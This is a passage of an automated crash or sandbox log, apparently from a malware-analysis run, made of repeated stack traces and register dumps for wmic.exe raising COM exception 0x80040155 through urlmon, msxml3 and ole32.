DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7517788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x7619a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x7619853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x7619a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x761acd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x761ad87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7677b727
registers.esp: 46527024
registers.edi: 6998796
registers.eax: 46527024
registers.ebp: 46527104
registers.edx: 49
registers.ebx: 46527388
registers.esi: 2147746133
registers.ecx: 6776032
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74fb374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x762bf725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74fc414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x7618fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x762ba338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x76b8e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x76b672ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x76b5ab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x76b8c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x76b587f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x76b58926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x76b5d55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x76b8c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x76b5d1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x76b5d1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x76b5d40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x76b5991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x76b58d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x76b5a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76b59b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76b59aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x6f976f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x6f976e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x6f9727a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x6f972652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x6f97253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x6f972411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x6f9725ab
wmic+0x39c80 @ 0xf9c80
wmic+0x3b06a @ 0xfb06a
wmic+0x3b1f8 @ 0xfb1f8
wmic+0x36fcd @ 0xf6fcd
wmic+0x3d6e9 @ 0xfd6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7677b727
registers.esp: 2419184
registers.edi: 1981610512
registers.eax: 2419184
registers.ebp: 2419264
registers.edx: 1
registers.ebx: 6745356
registers.esi: 2147746133
registers.ecx: 1829352479
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74fb374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x761e4387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74faef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74fa6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74fa6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74fa6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74fc5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x750406b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x762bd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x762bd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x762bddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x761d8a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x761d8938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x761d950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x762bdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x762bdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x762be1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x761d9367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x761d9326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x751762fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75176d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x751777c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7517788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x7619a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x7619853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x7619a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x761acd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x761ad87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7677b727
registers.esp: 47051320
registers.edi: 7533436
registers.eax: 47051320
registers.ebp: 47051400
registers.edx: 49
registers.ebx: 47051684
registers.esi: 2147746133
registers.ecx: 7300320
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74fb374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x762bf725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74fc414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x7618fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x762ba338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x76b8e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x76b672ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x76b5ab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x76b8c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x76b587f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x76b58926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x76b5d55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x76b8c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x76b5d1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x76b5d1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x76b5d40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x76b5991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x76b58d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x76b5a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76b59b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76b59aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x6f976f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x6f976e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x6f9727a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x6f972652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x6f97253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x6f972411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x6f9725ab
wmic+0x39c80 @ 0xf9c80
wmic+0x3b06a @ 0xfb06a
wmic+0x3b1f8 @ 0xfb1f8
wmic+0x36fcd @ 0xf6fcd
wmic+0x3d6e9 @ 0xfd6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7677b727
registers.esp: 2680200
registers.edi: 1981610512
registers.eax: 2680200
registers.ebp: 2680280
registers.edx: 1
registers.ebx: 7269644
registers.esi: 2147746133
registers.ecx: 1836308442
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74fb374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x761e4387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74faef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74fa6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74fa6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74fa6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74fc5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x750406b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x762bd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x762bd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x762bddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x761d8a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x761d8938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x761d950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x762bdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x762bdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x762be1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x761d9367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x761d9326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x751762fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75176d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x751777c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7517788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x7619a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x7619853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x7619a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x761acd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x761ad87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7677b727
registers.esp: 43513040
registers.edi: 7719820
registers.eax: 43513040
registers.ebp: 43513120
registers.edx: 49
registers.ebx: 43513404
registers.esi: 2147746133
registers.ecx: 7496936
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74fb374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x762bf725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74fc414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x7618fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x762ba338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x76b8e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x76b672ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x76b5ab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x76b8c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x76b587f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x76b58926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x76b5d55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x76b8c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x76b5d1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x76b5d1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x76b5d40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x76b5991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x76b58d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x76b5a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76b59b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76b59aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x6f976f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x6f976e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x6f9727a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x6f972652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x6f97253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x6f972411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x6f9725ab
wmic+0x39c80 @ 0xf9c80
wmic+0x3b06a @ 0xfb06a
wmic+0x3b1f8 @ 0xfb1f8
wmic+0x36fcd @ 0xf6fcd
wmic+0x3d6e9 @ 0xfd6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7677b727
registers.esp: 3008664
registers.edi: 1981610512
registers.eax: 3008664
registers.ebp: 3008744
registers.edx: 1
registers.ebx: 7466260
registers.esi: 2147746133
registers.ecx: 1840809391
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74fb374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x761e4387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74faef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74fa6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74fa6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74fa6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74fc5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x750406b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x762bd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x762bd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x762bddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x761d8a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x761d8938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x761d950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x762bdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x762bdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x762be1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x761d9367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x761d9326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x751762fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75176d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x751777c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7517788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x7619a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x7619853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x7619a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x761acd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x761ad87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7677b727
registers.esp: 48295496
registers.edi: 5491484
registers.eax: 48295496
registers.ebp: 48295576
registers.edx: 49
registers.ebx: 48295860
registers.esi: 2147746133
registers.ecx: 5268712
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74fb374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x762bf725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74fc414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x7618fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x762ba338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x76b8e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x76b672ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x76b5ab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x76b8c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x76b587f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x76b58926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x76b5d55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x76b8c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x76b5d1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x76b5d1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x76b5d40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x76b5991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x76b58d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x76b5a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76b59b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76b59aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x6f976f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x6f976e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x6f9727a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x6f972652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x6f97253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x6f972411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x6f9725ab
wmic+0x39c80 @ 0xf9c80
wmic+0x3b06a @ 0xfb06a
wmic+0x3b1f8 @ 0xfb1f8
wmic+0x36fcd @ 0xf6fcd
wmic+0x3d6e9 @ 0xfd6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7677b727
registers.esp: 1566528
registers.edi: 1981610512
registers.eax: 1566528
registers.ebp: 1566608
registers.edx: 1
registers.ebx: 5238036
registers.esi: 2147746133
registers.ecx: 1837830410
1 0 0

__exception__

 stacktrace: 
